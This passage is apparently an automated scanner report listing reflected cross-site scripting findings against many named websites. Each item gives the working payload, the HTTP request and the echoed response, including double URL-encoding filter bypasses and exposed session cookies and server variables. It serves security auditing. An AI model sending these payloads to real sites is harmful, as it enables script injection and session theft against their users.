<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html>
<head>
   <title></title>    <meta http-equiv="Content-Language" content="e
...[SNIP]...

var pageTracker = _gat._getTracker("");
pageTracker._setCampNameKey('id');
pageTracker._setVar("bbonet");
pageTracker._trackPageview("www.bigtitcreampie.com/favicon.ico1534a"-alert(1)-"9a18ac6c6e1");
}
catch(err) {}
</script>
...[SNIP]...

6.46. http://www.bigtitcreampie.com/favicon.ico [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bigtitcreampie.com
Path:   /favicon.ico

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e5933"-alert(1)-"62cc159c67b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /favicon.ico?e5933"-alert(1)-"62cc159c67b=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.bigtitcreampie.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Tue, 03 May 2011 11:31:35 GMT
Server: Apache
Set-Cookie: nomobile=0; path=/; domain=.bigtitcreampie.com; expires=Wed, 04-May-2011 07:31:35 GMT
Vary: Host,Accept-Encoding,User-Agent,Accept-Language
X-Powered-By: PHP/5.2.11-pl1-gentoo
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: psinfo=bbonet%7Cbigtitcreampie%7C1%7Cpps%7C%7C%7C%7C%7C%7C%7C%7C%7Cus; expires=Thu, 02-Jun-2011 11:31:35 GMT; path=/; domain=.bigtitcreampie.com
Set-Cookie: psextra=173.193.214.243%7COK%3B%7C; expires=Thu, 02-Jun-2011 11:31:35 GMT; path=/; domain=.bigtitcreampie.com
Cache-Control: max-age=900
Expires: Tue, 03 May 2011 11:46:35 GMT
Content-Type: text/html
Content-Length: 8706

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html>
<head>
   <title></title>    <meta http-equiv="Content-Language" content="e
...[SNIP]...
var pageTracker = _gat._getTracker("");
pageTracker._setCampNameKey('id');
pageTracker._setVar("bbonet");
pageTracker._trackPageview("www.bigtitcreampie.com/favicon.ico?e5933"-alert(1)-"62cc159c67b=1");
}
catch(err) {}
</script>
...[SNIP]...

6.47. http://www.bvonstyle.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bvonstyle.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7c33c"><x%20style%3dx%3aexpression(alert(1))>b9601e04b3b was submitted in the REST URL parameter 1. This input was echoed as 7c33c"><x style=x:expression(alert(1))>b9601e04b3b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /favicon.ico7c33c"><x%20style%3dx%3aexpression(alert(1))>b9601e04b3b HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.bvonstyle.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:05:45 GMT
Server: Apache/2.2
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Set-Cookie: GEO-173_193_214_243=usa%3A%3Adallas%3A%3A032.787%3A%3A-096.799%3A%3Abroadband%3A%3Atx; expires=Tue, 03-May-2011 12:05:45 GMT; path=/
Content-Type: text/html
Content-Length: 10952

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <title>BV on Style</title>
...[SNIP]...
<link rel="canonical" href="http://www.bvonstyle.com/favicon.ico7c33c"><x style=x:expression(alert(1))>b9601e04b3b/" />
...[SNIP]...

6.48. http://www.cashstore.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.cashstore.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 221b9"><img%20src%3da%20onerror%3dalert(1)>9c5e9d404d0 was submitted in the REST URL parameter 1. This input was echoed as 221b9"><img src=a onerror=alert(1)>9c5e9d404d0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /favicon.ico221b9"><img%20src%3da%20onerror%3dalert(1)>9c5e9d404d0 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.cashstore.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Tue, 03 May 2011 11:19:31 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: SESSbf3783e9f35cdd20ff6d0dfc9f8a8166=mjp0b56fnrvqibpd3n3tbbgg00; expires=Thu, 26-May-2011 14:52:51 GMT; path=/; domain=.cashstore.com
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Tue, 03 May 2011 11:19:31 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Length: 7750
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<
...[SNIP]...
<body class="not-front not-logged-in page-faviconico221b9img-srca-onerroralert19c5e9d404d0 no-sidebars favicon.ico221b9"><img src=a onerror=alert(1)>9c5e9d404d0 favicon.ico221b9">
...[SNIP]...

6.49. http://www.cerritos.edu/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.cerritos.edu
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 367ec%253cscript%253ealert%25281%2529%253c%252fscript%253ea2a333b627d was submitted in the REST URL parameter 1. This input was echoed as 367ec<script>alert(1)</script>a2a333b627d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /favicon.ico367ec%253cscript%253ealert%25281%2529%253c%252fscript%253ea2a333b627d HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.cerritos.edu
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:42:28 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Expires: Mon, 02 May 2011 11:42:27 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 9682


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-us">
<head><titl
...[SNIP]...
<p />(Referring Page: favicon.ico367ec<script>alert(1)</script>a2a333b627d)
<p />
...[SNIP]...

6.50. http://www.churchleaderinsights.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.churchleaderinsights.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 2b9b8<script>alert(1)</script>fb5f52160f9 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico2b9b8<script>alert(1)</script>fb5f52160f9 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.churchleaderinsights.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:50:34 GMT
Server: Apache
Set-Cookie: exp_last_visit=989059834; expires=Wed, 02-May-2012 10:50:34 GMT; path=/
Set-Cookie: exp_last_activity=1304419834; expires=Wed, 02-May-2012 10:50:34 GMT; path=/
Set-Cookie: exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A19%3A%22oops-page-not-found%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Tue, 03 May 2011 10:50:35 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 25967

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <title>Oops...
...[SNIP]...
<strong>/favicon.ico2b9b8<script>alert(1)</script>fb5f52160f9</strong>
...[SNIP]...

6.51. http://www.click-now.net/favicon.ico [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.click-now.net
Path:   /favicon.ico

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c67c7"><a>a859c78e1d3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /favicon.ico?c67c7"><a>a859c78e1d3=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.click-now.net
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Tue, 03 May 2011 10:49:18 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.8
X-Powered-By: PHP/5.2.8
Set-Cookie: _downloadBarCom=3f8b63343a99c3443f4758b05ac2e929; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: _downloadBarCom=9661ebbcbb2536ac2e3b1d997866c9db; path=/
Content-Type: text/html
Content-Length: 10417

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<a id="tellafriend" href="http://www.downloadbar.com/tellafriend.php?page=www.click-now.net/favicon.ico?c67c7"><a>a859c78e1d3=1&keepThis=true&TB_iframe=true&height=280&width=550" class="thickbox pinklink">
...[SNIP]...

6.52. http://www.coinmerc.com/favicon.ico [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.coinmerc.com
Path:   /favicon.ico

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5b49f"><script>alert(1)</script>1e753f7fc5c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico?5b49f"><script>alert(1)</script>1e753f7fc5c=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.coinmerc.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:37:49 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=iso-8859-1
Content-Length: 68308

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en">
<head>
<title>
...[SNIP]...
<a href="http://www.coinmerc.com/ko/index/5b49f"><script>alert(1)</script>1e753f7fc5c/1/5b49f">
...[SNIP]...

6.53. http://www.diethealthclub.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.diethealthclub.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 190f9"><script>alert(1)</script>47bfedf4e79 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico190f9"><script>alert(1)</script>47bfedf4e79 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.diethealthclub.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Tue, 03 May 2011 10:29:02 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: PHPSESSID=2lpi2j10dudnotdiacb4u7tnd0; expires=Wed, 02 May 2012 10:29:02 GMT; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 16351

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <title>Page Not Found</
...[SNIP]...
<a title="del.icio.us" href="http://del.icio.us/post?url=http://www.diethealthclub.com/favicon.ico190f9"><script>alert(1)</script>47bfedf4e79" target="_blank" class="delicious" rel="nofollow">
...[SNIP]...

6.54. http://www.fluke.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fluke.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d4def%2522%253balert%25281%2529%252f%252f9b13c6b24ed was submitted in the REST URL parameter 1. This input was echoed as d4def";alert(1)//9b13c6b24ed in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /favicon.icod4def%2522%253balert%25281%2529%252f%252f9b13c6b24ed HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.fluke.com
Accept: */*
Proxy-Connection: Keep-Alive

Response (redirected)

HTTP/1.1 404 Not Found
Cache-Control: private
Set-Cookie: .ASPXANONYMOUS=jOvnhRBAzAEkAAAAMDYzMjJmOGItNTdjYy00ZjE0LWFiZTUtZGMxZjhhODA5MTcwoX4U3QnRpeq2OGYGSX9LdGSmrvA1; expires=Mon, 11-Jul-2011 21:21:39 GMT; path=/; HttpOnly
Content-Length: 69788
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 10:41:39 GMT
Connection: keep-alive


<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="_ctl0_Head1"><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><meta
...[SNIP]...
<!--
s.pageName="favicon.icod4def";alert(1)//9b13c6b24ed 404";
s.pageType='errorPage';var OmniUserGUID;
function readCookie(c_name) {
var c_start,c_end;
if (document.cookie.length>
...[SNIP]...

6.55. http://www.fluke.com/favicon.ico [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fluke.com
Path:   /favicon.ico

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 89480"%3balert(1)//74e63558e96 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 89480";alert(1)//74e63558e96 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /favicon.ico?89480"%3balert(1)//74e63558e96=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.fluke.com
Accept: */*
Proxy-Connection: Keep-Alive

Response (redirected)

HTTP/1.1 404 Not Found
Cache-Control: private
Set-Cookie: .ASPXANONYMOUS=tHxqbBBAzAEkAAAAYzk2ZWE3MGYtYTdjZS00ZTcxLWFiYjAtYTRhYjBjYzY0MDkxzQN7HNG7GWuJSfwBnGTGwMu95y41; expires=Mon, 11-Jul-2011 21:20:56 GMT; path=/; HttpOnly
Content-Length: 69809
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 10:40:57 GMT
Connection: keep-alive


<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="_ctl0_Head1"><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><meta
...[SNIP]...
<!--
s.pageName="favicon.ico?89480";alert(1)//74e63558e96=1 404";
s.pageType='errorPage';var OmniUserGUID;
function readCookie(c_name) {
var c_start,c_end;
if (document.cookie.length>
...[SNIP]...

6.56. http://www.forconstructionpros.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.forconstructionpros.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 38d7f<script>alert(1)</script>465149a15ad was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico38d7f<script>alert(1)</script>465149a15ad HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.forconstructionpros.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Tue, 03 May 2011 11:19:49 GMT
Server: Apache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 599

<head>
<title>ERROR 404</title>
</head>
<center>
<h1>www.forconstructionpros.com</h1>
<h1><strong>ERROR 404</strong></h1>
</center>
<strong>The URL that you requested, /favicon.ico38d7f<script>alert(1)</script>465149a15ad
could not be found. Perhaps you either mistyped the
URL or we have a broken link.</strong>
...[SNIP]...

6.57. http://www.greatnow.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.greatnow.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into an HTML comment. The payload 19bcc--><script>alert(1)</script>b85e5b127a8 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /favicon.ico19bcc--><script>alert(1)</script>b85e5b127a8 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.greatnow.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.0 404 Not Found
Date: Tue, 03 May 2011 11:24:16 GMT
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html
X-Cache: MISS from squid2.0catch.com
Connection: close

<!--
DOCUMENT_ROOT = /home/catch/htdocs
GATEWAY_INTERFACE = CGI/1.1
HTTP_ACCEPT = */*
HTTP_CACHE_CONTROL = max-age=259200
HTTP_CONNECTION = keep-alive
HTTP_HOST = greatnow.com
HTTP_USER_AGENT = curl/7
...[SNIP]...
243
MOD_PERL = mod_perl/2.0.4
MOD_PERL_API_VERSION = 2
PATH = /usr/local/bin:/usr/bin:/bin
QUERY_STRING =
REMOTE_ADDR = 192.41.60.75
REMOTE_PORT = 18090
REQUEST_METHOD = GET
REQUEST_URI = /favicon.ico19bcc--><script>alert(1)</script>b85e5b127a8
SCRIPT_FILENAME = /home/catch/cgi-bin/parse.pl
SCRIPT_NAME = /favicon.ico19bcc-->
...[SNIP]...

6.58. http://www.greatnow.com/favicon.ico [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.greatnow.com
Path:   /favicon.ico

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 9ddd5--><script>alert(1)</script>7edd33653a3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /favicon.ico?9ddd5--><script>alert(1)</script>7edd33653a3=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.greatnow.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.0 404 Not Found
Date: Tue, 03 May 2011 11:24:10 GMT
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html
X-Cache: MISS from squid2.0catch.com
Connection: close

<!--
DOCUMENT_ROOT = /home/catch/htdocs
GATEWAY_INTERFACE = CGI/1.1
HTTP_ACCEPT = */*
HTTP_CACHE_CONTROL = max-age=259200
HTTP_CONNECTION = keep-alive
HTTP_HOST = greatnow.com
HTTP_USER_AGENT = curl/7
...[SNIP]...
.3
HTTP_VIA = 1.1 squid2.0catch.com:80 (squid/2.5.STABLE14)
HTTP_X_FORWARDED_FOR = 173.193.214.243
MOD_PERL = mod_perl/2.0.4
MOD_PERL_API_VERSION = 2
PATH = /usr/local/bin:/usr/bin:/bin
QUERY_STRING = 9ddd5--><script>alert(1)</script>7edd33653a3=1
REMOTE_ADDR = 192.41.60.75
REMOTE_PORT = 12058
REQUEST_METHOD = GET
REQUEST_URI = /favicon.ico?9ddd5-->
...[SNIP]...

6.59. http://www.healthcarejobsite.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.healthcarejobsite.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is not encapsulated in any quotation marks. The payload ffe89%20style%3dx%3aexpression(alert(1))%200209854a144 was submitted in the REST URL parameter 1. This input was echoed as ffe89 style=x:expression(alert(1)) 0209854a144 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /favicon.icoffe89%20style%3dx%3aexpression(alert(1))%200209854a144 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.healthcarejobsite.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404
Cache-Control: private
Content-Length: 20541
Content-Type: text/html
Server: Microsoft-IIS/7.0
Set-Cookie: DidIPLkup=Y; expires=Wed, 04-May-2011 04:00:00 GMT; path=/
Set-Cookie: PORTAL=NEWUSERSITE=&USERSTATEABBR=TX&USERSTATE=TEXAS&HTTPREFERRER=&USERGID=714162536746466581&USERCOUNTRY=US&USERCITY=DALLAS&CookieVersion=2%2E0&PARTNER=HEALTHCAREJOBSITE%2ECOM; expires=Wed, 02-May-2012 04:00:00 GMT; path=/
Set-Cookie: Visitor=NewSessionID=EE3C17B2%2DB880%2D44F3%2DBF5F%2D90B0921267EE; path=/
Set-Cookie: ASPSESSIONIDSSQARRRA=EFGMBJLDLFLNKMCAFBHGFHHI; path=/
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 11:07:57 GMT


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<style type="text/cs
...[SNIP]...
Jobsite.com&t_pgid=610711554272457396&t_sn=/common/error/checkurl.asp&t_httph=www.healthcarejobsite.com&t_httpurl=/common/error/checkurl.asp&t_httpqs=404;http://www.healthcarejobsite.com:80/favicon.icoffe89 style=x:expression(alert(1)) 0209854a144&t_sgid=748241823514461389&t_ws=COLO-WEB02&t_ugid=714162536746466581&f_ip=173.193.214.243&ud=>
...[SNIP]...

6.60. http://www.healthiertalk.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.healthiertalk.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e3aad"><script>alert(1)</script>9679a04c57e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.icoe3aad"><script>alert(1)</script>9679a04c57e HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.healthiertalk.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Tue, 03 May 2011 10:32:49 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.10
Set-Cookie: SESS24200d503af176385808d33f42491be3=30po8icql601pd1jrvvv30b9f4; expires=Thu, 26-May-2011 14:06:09 GMT; path=/; domain=.healthiertalk.com
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Tue, 03 May 2011 10:32:49 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 21522

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
<head>
<
...[SNIP]...
<link rel="canonical" href="http://www.healthiertalk.com/favicon.icoe3aad"><script>alert(1)</script>9679a04c57e" />
...[SNIP]...

6.61. http://www.hollywoodpix.net/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.hollywoodpix.net
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 946e9%253balert%25281%2529%252f%252f48748d09025 was submitted in the REST URL parameter 1. This input was echoed as 946e9;alert(1)//48748d09025 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

